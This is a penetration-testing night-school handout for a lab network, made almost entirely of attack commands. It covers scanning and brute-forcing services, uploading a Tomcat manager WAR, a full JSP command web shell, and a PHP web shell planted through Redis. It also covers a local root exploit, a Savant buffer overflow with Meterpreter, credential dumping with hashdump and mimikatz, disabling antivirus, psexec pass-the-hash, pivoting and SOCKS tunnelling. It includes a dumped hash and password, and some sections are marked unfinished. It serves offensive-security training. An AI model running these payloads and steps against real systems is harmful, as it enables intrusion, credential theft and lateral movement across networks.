  1. ########################################
  2. # Advanced Pentester Night School      #
  3. # By Joe McCray of Strategic Security  #
  4. ########################################
  5.  
  6.  
  7. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
  8.  
  9. So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
  10. https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf
  11.  
  12. sudo nmap -sP 10.0.0.0/24
  13.      infosecaddicts
  14.  
  15. sudo nmap -sL 10.0.0.0/24
  16.      infosecaddicts
  17.  
  18.  
  19. for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
  20.  
  21. cd ~/toolz
  22.  
  23. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  24.  
  25. gcc ipcrawl.c -o ipcrawl
  26.  
  27. chmod 777 ipcrawl
  28.  
  29. ./ipcrawl 10.0.0.1 10.0.0.254
  30.  
  31.  
  32.  
  33. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  34.  
  35. gcc propecia.c -o propecia
  36.  
  37. sudo cp propecia /bin
  38.      infosecaddicts
  39.  
  40. propecia 10.0.0 22
  41.  
  42. propecia 10.0.0 3389
  43.  
  44. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
  45.  
  46. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
  47.  
  48. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
  49.  
  50. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
  51.  
  52. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
  53.  
  54. cd ~/toolz
  55.  
  56.  
  57.  
  58. #################################################
  59. # Screenshotting the Web Servers in the Network #
  60. #################################################
  61. cd ~/toolz/
  62. mkdir labscreenshots
  63. cd labscreenshots/
  64.  
  65.  
  66. wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  67. tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  68. cd wkhtmltox/bin/
  69. sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
  70.  
  71.  
  72. cd ~/toolz/
  73. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  74. cd Nmap-Tools/NSE/
  75. sudo cp http-screenshot.nse /usr/share/nmap/scripts/
  76.      infosecaddicts
  77.  
  78. sudo nmap --script-updatedb
  79.      infosecaddicts
  80.  
  81.  
  82. cd ~/toolz/labscreenshots/
  83. sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
  84.      infosecaddicts
  85.  
  86.  
  87.  
  88.  
  89. vi screenshots.sh
  90.  
  91. #!/bin/bash
  92. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  93. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  94. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  95.  
  96.  
  97.  
  98.  
  99.  
  100. sh screenshots.sh
  101.  
  102.  
  103.  
  104.  
  105. ##########################
  106. # Nmap NSE tricks to try #
  107. ##########################
  108. sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
  109.      infosecaddicts
  110.  
  111. sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
  112.      infosecaddicts
  113.  
  114. sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
  115.      infosecaddicts
  116.  
  117. sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
  118.      infosecaddicts
  119.  
  120. sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
  121.      infosecaddicts
  122.  
  123. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
  124.      infosecaddicts
  125.  
  126. sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
  127.      infosecaddicts
  128.  
  129. sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
  130.      infosecaddicts
  131.  
  132. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
  133.      infosecaddicts
  134.  
  135. sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
  136.      infosecaddicts
  137.  
  138. sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
  139.      infosecaddicts
  140.  
  141. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
  142.      infosecaddicts
  143.  
  144.  
  145.  
  146.  
  147. #########################
  148. # Building a quick list #
  149. #########################
  150. cd ~
  151. echo bob >> list.txt
  152. echo jim >> list.txt
  153. echo joe >> list.txt
  154. echo tim >> list.txt
  155. echo admin >> list.txt
  156. echo hello >> list.txt
  157. echo rob >> list.txt
  158. echo test >> list.txt
  159. echo aaaaaa >> list.txt
  160. echo larry >> list.txt
  161. echo mario >> list.txt
  162. echo jason >> list.txt
  163. echo john >> list.txt
  164.  
  165.  
  166. ##############
  167. # Using Nmap #
  168. ##############
  169. ******** NOTE: Some of these scans may take up to an hour to run... ********
  170. ******** NOTE: Open them in another terminal window and keep going  ********
  171.  
  172. sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan)
  173.  
  174. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  175.  
  176. sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120
  177.  
  178. sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan)
  179.  
  180. sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120
  181.  
  182.  
  183. ******** NOTE: Some of these scans may take up to an hour to run... ********
  184. ******** NOTE: Open them in another terminal window and keep going  ********
  185.  
  186.  
  187.  
  188. #########################
  189. # Playing with Nmap NSE #
  190. #########################
  191.  
  192. nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
  193.  
  194. nmap -p80 --script dns-brute infosecaddicts.com
  195.  
  196. nmap --script http-robtex-reverse-ip secore.info
  197.  
  198. nmap -Pn -p80 --script=http-headers infosecaddicts.com
  199.  
  200.  
  201. ls /usr/share/nmap/scripts | grep http
  202. nmap -Pn -p80 --script=http-* infosecaddicts.com
  203.  
  204.  
  205.  
  206.  
  207. #####################################
  208. # Writing Your Own Nmap NSE Scripts #
  209. #####################################
  210.  
  211.  
  212. ----------------------------------------------------------------------
  213. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  214.  
-- The Head Section --
-- Nothing is required yet: this first version only reads the fields
-- nmap passes in on the port table.

-- The Rule Section --
-- portrule decides whether action() runs for a given host/port pair;
-- here only an open TCP port 80 qualifies.
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end

-- The Action Section --
-- Whatever action returns is the script output nmap reports for that
-- port. host and port are unused in this version.
action = function(host, port)
    return "February class bundle!"
end
  227. ----------------------------------------------------------------------
  228.  
  229. - Ok, now that we've made that change let's run the script
  230. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237. ----------------------------------------------------------------------
  238. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  239.  
-- The Head Section --
local shortport = require "shortport"

-- The Rule Section --
-- shortport.http is a ready-made rule from the shortport library that
-- replaces the hand-written tcp/80 check of the previous version (it
-- covers the HTTP ports/services the library knows about, not just 80).
portrule = shortport.http

-- The Action Section --
-- Unchanged: a fixed string is reported for every port the rule accepts.
action = function(host, port)
    return "February class bundle!"
end
  251. ----------------------------------------------------------------------
  252.  
  253. - Ok, now that we've made that change let's run the script
  254. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261.  
  262. OK, now let's have some fun with my buddy Carlos Perez's website, which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  263.  
  264. ----------------------------------------------------------------------
  265. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  266.  
-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one fixed path from the matched web port and report the HTTP
-- status code as the script output.
-- NOTE(review): no check is made that the request succeeded; if http.get
-- could not get a response, response.status is presumably nil and the
-- script reports nothing.
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status

end
  282. ----------------------------------------------------------------------
  283.  
  284. - Ok, now that we've made that change let's run the script
  285. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  286.  
  287.  
  288.  
  289.  
  290. ----------------------------------------------------------------------
  291. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  292.  
-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one fixed path and, only on a 200 response, return the whole
-- body as the script output. Any other status (or a failed request)
-- falls off the end of the function and returns nil, i.e. no output.
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        return response.body
    end

end
  311. ----------------------------------------------------------------------
  312.  
  313. - Ok, now that we've made that change let's run the script
  314. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324. ----------------------------------------------------------------------
  325. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  326.  
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one fixed path; on a 200 response search the body for a literal
-- title string and return the match (the title itself) or nil if absent.
-- Non-200 responses return nil, i.e. no output.
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        -- string.match takes a Lua pattern; this one contains no magic
        -- characters, so it behaves as a plain substring search.
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end

end
  347. ----------------------------------------------------------------------
  348.  
  349. - Ok, now that we've made that change let's run the script
  350. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  351.  
  352.  
  353.  
  354.  
  355.  
  356.  
  357.  
  358. ----------------------------------------------------------------------
  359. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  360.  
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one fixed path; on a 200 response report "Vulnerable" when a
-- literal title string appears in the body and "Not Vulnerable" when it
-- does not. Non-200 responses return nil, i.e. no output.
--
-- Note that the verdict is driven solely by the presence of that one
-- string in the page: it is a presence check that demonstrates the
-- branch structure, not a version or configuration check.
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        -- Plain substring search: the pattern has no magic characters.
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end
  385.  
  386. ----------------------------------------------------------------------
  387.  
  388. - Ok, now that we've made that change let's run the script
  389. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402. ******** Attacking Kevgir ********
  403. I figured I'd give you something fun to play with.
  404.  
  405.  
  406.  
  407. ###############
  408. # Using Nikto #
  409. ###############
  410. cd ~/toolz/nikto-2.1.1
  411.  
  412. perl nikto.pl -update
  413.  
  414. perl nikto.pl -h 10.0.0.120
  415.  
  416. perl nikto.pl -h 10.0.0.120:8080
  417.  
  418. perl nikto.pl -h 10.0.0.120:8081
  419.  
  420. perl nikto.pl -h 10.0.0.120:9000
  421.  
  422.  
  423.  
  424.  
  425. ####################
  426. # Using Metasploit #
  427. ####################
  428. cd ~/toolz/metasploit
  429.  
  430. ./msfconsole
  431.  
  432. use auxiliary/scanner/http/http_version        
  433.  
  434. set RHOSTS 10.0.0.120
  435.  
  436. set RPORT 8080
  437.  
  438. run
  439.  
  440.  
  441. -------------------------------
  442.  
  443. use auxiliary/scanner/http/tomcat_enum           
  444.  
  445. set RHOSTS 10.0.0.120
  446.  
  447. set RPORT 8080
  448.  
  449. run
  450.  
  451.  
  452.  
  453.  
  454.  
  455. ####################
  456. # Attacking Tomcat #
  457. ####################
  458. cd ~/toolz/metasploit
  459.  
  460. ./msfconsole
  461.  
  462. use auxiliary/scanner/http/http_version        
  463.  
  464. set RHOSTS 10.0.0.120
  465.  
  466. set RPORT 8080
  467.  
  468. run
  469.  
  470.  
  471.  
  472.  
  473.  
  474. use auxiliary/scanner/http/tomcat_mgr_login          
  475.  
  476. set USERNAME tomcat
  477.  
  478. set USERPASS_FILE /home/infosecaddicts/list.txt
  479.  
  480. set STOP_ON_SUCCESS true
  481.  
  482. set RHOSTS 10.0.0.120
  483.  
  484. set RPORT 8080
  485.  
  486. run
  487.  
  488.  
  489.  
  490.  
  491. use exploit/multi/http/tomcat_mgr_upload
  492.  
  493. set USERNAME tomcat
  494.  
  495. set PASSWORD tomcat
  496.  
  497. set RHOST 10.0.0.120
  498.  
  499. set RPORT 8080
  500.  
  501. set PATH /manager/html
  502.  
  503. set PAYLOAD java/meterpreter/bind_tcp
  504.  
  505. exploit
  506.  
  507.  
  508. run post/linux/gather/checkvm
  509.  
  510. run post/linux/gather/enum_configs
  511.  
  512. run post/linux/gather/enum_protections
  513.  
  514. run post/linux/gather/enum_system
  515.  
  516. run post/linux/gather/enum_users_history
  517.  
  518. run post/linux/gather/hashdump
  519.  
  520. shell
  521.  
  522. /bin/bash
  523.  
  524. id
  525.  
  526. uname -a
  527.  
  528. dpkg -l
  529.  
  530. cd /tmp
  531.  
  532. pwd
  533.  
  534.  
  535. cat >> exploit.c << out
  536.  
  537. **************paste in the content from here *****************
  538. https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
  539.  
  540.  
  541. ------ hit enter a few times ------
  542.  
  543. ------ then type 'out' ----- this closes the file handle...
  544.  
  545.  
  546. gcc -o boom exploit.c
  547.  
  548. ./boom
  549.  
  550. id
  551.  
  552.  
  553. -------------------------------
  554.  
  555.  
  556. hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html
  557.  
  558.  
  559.  
  560.  
  561.  
  562. -------------------------------------------index.jsp-------------------------------------------
  563. <FORM METHOD=GET ACTION='index.jsp'>
  564. <INPUT name='cmd' type=text>
  565. <INPUT type=submit value='Run'>
  566. </FORM>
  567. <%@ page import="java.io.*" %>
  568. <%
  569.    String cmd = request.getParameter("cmd");
  570.    String output = "";
  571.    if(cmd != null) {
  572.       String s = null;
  573.       try {
  574.          Process p = Runtime.getRuntime().exec(cmd,null,null);
  575.          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  576.          while((s = sI.readLine()) != null) { output += s+"</br>"; }
  577.       }  catch(IOException e) {   e.printStackTrace();   }
  578.    }
  579. %>
  580. <pre><%=output %></pre>
  581. -------------------------------------------index.jsp-------------------------------------------
  582.  
  583. ***** now pack the webshell *****
  584.  
  585.  
  586.  
  587. mkdir webshell
  588. cp index.jsp webshell
  589.  
  590. cd webshell
  591. jar -cvf ../webshell.war *
  592.  
  593.  
  594. Deploy the WAR file using the built-in deploy option on the manager web-page.
  595. Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
  596. now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/
  597.  
  598.  
  599.  
  600. ****** This section isn't finished ******
  601.  
  602. cd ~/toolz/metasploit
  603.  
  604. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
  605.  
  606. jar tf ~/bind7777.war
  607.  
  608. ****** This section isn't finished ******
  609.  
  610. Google is your friend hahahahahahahah........
  611.  
  612.  
  613. #################
  614. # Attacking FTP #
  615. #################
  616.  
  617. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  618.  
  619. cd ~/toolz/hydra
  620.  
  621. hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp
  622.  
  623. ftp
  624. open 10.0.0.120
  625. admin
  626. admin
  627. pwd
  628. ls -lah
  629.  
  630. ls ../../
  631.  
  632.  
  633. #################
  634. # Attacking SSH #
  635. #################
  636. cd ~/toolz/hydra
  637.  
  638. hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh
  639.  
  640. ssh -p 1322 admin@10.0.0.120
  641.  
  642.  
  643.  
  644.  
  645. cd ~/toolz/metasploit
  646.  
  647. ./msfconsole
  648.  
  649. use auxiliary/scanner/ssh/ssh_users          
  650.  
  651. set USER_FILE /home/infosecaddicts/list.txt
  652.  
  653. set STOP_ON_SUCCESS true
  654.  
  655. set RHOSTS 10.0.0.120
  656.  
  657. set RPORT 1322
  658.  
  659. run
  660.  
  661.  
  662.  
  663.  
  664.  
  665. use auxiliary/scanner/ssh/ssh_login          
  666.  
  667. set USER_FILE /home/infosecaddicts/list.txt
  668.  
  669. set PASS_FILE /home/infosecaddicts/list.txt
  670.  
  671. set STOP_ON_SUCCESS true
  672.  
  673. set RHOSTS 10.0.0.120
  674.  
  675. set RPORT 1322
  676.  
  677. run
  678.  
  679.  
  680. sessions -l
  681.  
  682. sessions -u 1
  683.  
  684. sessions -i 1
  685.  
  686. id
  687.  
  688.  
  689.  
  690. ########################
  691. # Attacking phpMyAdmin #
  692. ########################
  693. ****** This section isn't finished ******
  694.  
  695. hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  696.  
  697. ****** This section isn't finished ******
  698.  
  699. Google is your friend hahahahahahahah........
  700.  
  701.  
  702.  
  703.  
  704. wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
  705.  
  706. python pmabf.py http://10.0.0.120 root list.txt     (this gave me the WRONG password)
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713. ####################
  714. # Attacking Joomla #
  715. ####################
  716. cd ~/toolz/metasploit
  717.  
  718. ./msfconsole
  719.  
  720. use use auxiliary/scanner/http/joomla_plugins            
  721.  
  722. set RHOSTS 10.0.0.120
  723.  
  724. set RPORT 8080
  725.  
  726. run
  727.  
  728.  
  729. ****** This section isn't finished ******
  730. Google is your friend hahahahahahahah........
  731.  
  732. #####################
  733. # Attacking Jenkins #
  734. #####################
  735.  
  736.  
  737. ****** This section isn't finished ******
  738. Google is your friend hahahahahahahah........
  739.  
  740. #################
  741. # Attacking NFS #
  742. #################
  743. rpcinfo -s 10.0.0.120
  744.  
  745. showmount -e 10.0.0.120
  746.  
  747. mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock
  748.  
  749. ls /tmp/nfs
  750.  
  751. cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
  752. umount -l /tmp/nfs
  753.  
  754. sudo apt-cache search fcrackzip
  755.  
  756. sudo apt-get install -y fcrackzip
  757.  
  758. fcrackzip -D -p /home/infosecaddicts/list.txt
  759.  
  760. unzip -P aaaaaa backup.tar.bz2.zip
  761.  
  762. tar -zxvf backup.tar.bz2
  763.  
  764.  
  765. ###################
  766. # Attacking Redis #
  767. ###################
  768. sudo nmap -p 6379 --script=redis-info 10.0.0.120
  769.     infosecaddicts
  770.  
  771. sudo apt-get install -y redis-tools
  772.     infosecaddicts
  773.  
  774. redis-cli -h 10.0.0.120
  775.  
  776. CONFIG SET dir /var/www/html/main
  777.  
  778. CONFIG GET dir
  779.  
  780. config set dbfilename bomba.php
  781.  
  782. CONFIG GET dbfilename
  783.  
  784. SET cmd "<?php system($_GET['joe']); ?>"
  785.  
  786. BGSAVE
  787.  
  788. http://10.0.0.120/bomba.php
  789.  
  790. http://10.0.0.120/bomba.php?joe=id
  791.  
  792.  
  793. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
  794.  
  795.  
  796.  
  797. ****** This section isn't finished ******
  798. Google is your friend hahahahahahahah........
  799.  
  800. cd ~/toolz/metasploit
  801.  
  802. ./msfconsole
  803.  
  804. use auxiliary/scanner/redis/file_upload
  805.  
  806. set RHOSTS 10.0.0.120
  807.  
  808. set LocalFile
  809.  
  810. ****** This section isn't finished ******
  811.  
  812.  
  813.  
  814.  
  815.  
  816.  
  817. ####################################
  818. # Finally, let's exploit something #
  819. ####################################
  820.  
  821. nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
  822.  
  823. nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
  824.  
  825.     https://www.exploit-db.com/search
  826.  
  827.     Search for:
  828.     Savant httpd 3.1
  829.     Apache httpd 2.0.58 ((Win32))
  830.  
  831.  
  832.     Found one written in Python:
  833.     https://www.exploit-db.com/exploits/18401/
  834.  
  835.     Found one for Savant 3.1 from Metasploit:
  836.     https://www.exploit-db.com/exploits/16770/
  837.  
  838.  
  839.  
  840. cd ~/toolz/metasploit
  841. ./msfconsole
  842. use exploit/windows/http/savant_31_overflow
  843. set RHOST 10.0.0.15
  844. set PAYLOAD windows/meterpreter/bind_nonx_tcp
  845. set RPORT 80
  846. set LPORT 7777
  847. exploit
  848.  
  849.  
  850.  
  851.  
  852.  
  853.  
  854. ********************************** Figure out who and where you are **********************************
  855.  
  856. meterpreter> sysinfo
  857.  
  858.  
  859. meterpreter> getuid
  860.  
  861.  
  862. meterpreter> ipconfig
  863.  
  864.  
  865. meterpreter> run post/windows/gather/checkvm
  866.  
  867.  
  868. meterpreter> run get_local_subnets
  869.  
  870.  
  871.  
  872. ********************************** Escalate privileges and get hashes **********************************
  873.  
  874.  
  875. meterpreter> use priv
  876.  
  877.  
  878.  
  879. meterpreter > getsystem
  880. ...got system (via technique 1).
  881.  
  882. meterpreter > getuid
  883. Server username: NT AUTHORITY\SYSTEM
  884.  
  885. --------------------------------------------------------
  886.  
  887. meterpreter> run killav
  888.  
  889. meterpreter> run post/windows/gather/hashdump
  890.    
  891.     Got the following admin hash:
  892.     Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
  893.  
  894. meterpreter> run post/windows/gather/credentials/credential_collector
  895.  
  896. meterpreter > load mimikatz
  897.  
  898. meterpreter > kerberos
  899.  
  900.     This should give me the administrative password:
  901.     )K5?Jocb(Yx
  902.  
  903.  
  904. ********************************** Enumerate the host you are on **********************************
  905.  
  906. meterpreter> run winenum
  907.  
  908. meterpreter > run post/windows/gather/enum_applications
  909.  
  910. meterpreter > run post/windows/gather/enum_logged_on_users
  911.  
  912. meterpreter > run post/windows/gather/usb_history
  913.  
  914. meterpreter > run post/windows/gather/enum_shares
  915.  
  916. meterpreter > run post/windows/gather/enum_snmp
  917.  
  918. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  919.  
  920.  
  921. ********************************** Get out of Meterpreter **********************************
  922.  
  923. meterpreter> background
  924.  
  925. msf exploit(savant_31_overflow) > back
  926.  
  927. msf>
  928.  
  929.  
  930.  
  931.  
  932. ********************************** Lateral Movement *******************************
  933.  
  934.  
  935. Now we can run the PSEXEC exploit.
  936.  
  937. -- Option 1:
  938. use exploit/windows/smb/psexec
  939.  
  940. set SMBUser Administrator
  941.  
  942. set SMBPass )K5?Jocb(Yx
  943.  
  944. set RHOST 10.0.0.15
  945.  
  946. set payload windows/meterpreter/bind_tcp
  947.  
  948. set LPORT 2345
  949.  
  950. exploit
  951.  
  952. ********************************** Get out of Meterpreter **********************************
  953.  
  954. meterpreter> background
  955.  
  956. msf exploit(psexec) >back
  957.  
  958. msf>
  959.  
  960. **********************************  
  961.  
  962. -- Option 2:
  963. use exploit/windows/smb/psexec
  964.  
  965. set SMBUser Administrator
  966.  
  967. set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
  968.  
  969. set payload windows/meterpreter/bind_tcp
  970.  
  971. set RHOST 10.0.0.15                      
  972.  
  973. set LPORT 5678
  974.  
  975. exploit
  976.  
  977.  
  978.  
  979. ********************************** Set up your Pivot **********************************
  980.  
  981. meterpreter > background
  982.                                                         <-- background the session
  983.         You want to get back to this prompt:
  984.         msf exploit(handler) > back                     <--- you need to get to main msf> prompt
  985.  
  986.  
  987.  
  988.         sessions -l                                     <--find a session you want to pivot through (note the IP and session number)
  989.        
  990.         Now set up Pivot with a route add
  991.         ---------------------------------
  992.  
  993. route print                                             <--- should be blank
  994.  
  995. route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prompt, not meterpreter)
  996.  
  997.  
  998. route print                                             <----- verify new route
  999.  
  1000. ******************************Scan through your Pivot ******************************
  1001.  
  1002. use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
  1003.  
  1004. set THREADS 10
  1005.  
  1006. set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack
  1007.  
  1008. set PORTS 445
  1009.  
  1010. run
  1011.  
  1012.  
  1013. ####################################
  1014. # Socks Tunneling with Proxychains #
  1015. ####################################
  1016. --- Open a duplicate putty session to your Ubuntu host
  1017.  
  1018. sudo apt-get install -y proxychains
  1019.     infosecaddicts
  1020.  
  1021. sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
  1022.      infosecaddicts
  1023.  
  1024.         Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  1025.         socks4  127.0.0.1 1080
  1026.  
  1027. ***************************Set up a Socks Proxy through your Pivot *************************
  1028.  
  1029.  
  1030. use auxiliary/server/socks4a
  1031.  
  1032. set SRVHOST 127.0.0.1
  1033.  
  1034. set SRVPORT 1080
  1035.  
  1036. run
  1037.  
  1038.         --- Go back to your other putty session with the meterpreter shell
  1039. cd ~
  1040.  
  1041. proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow
  1042.  
  1043. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow
  1044.  
  1045.  
  1046.         ---close the duplicate putty session to your Ubuntu host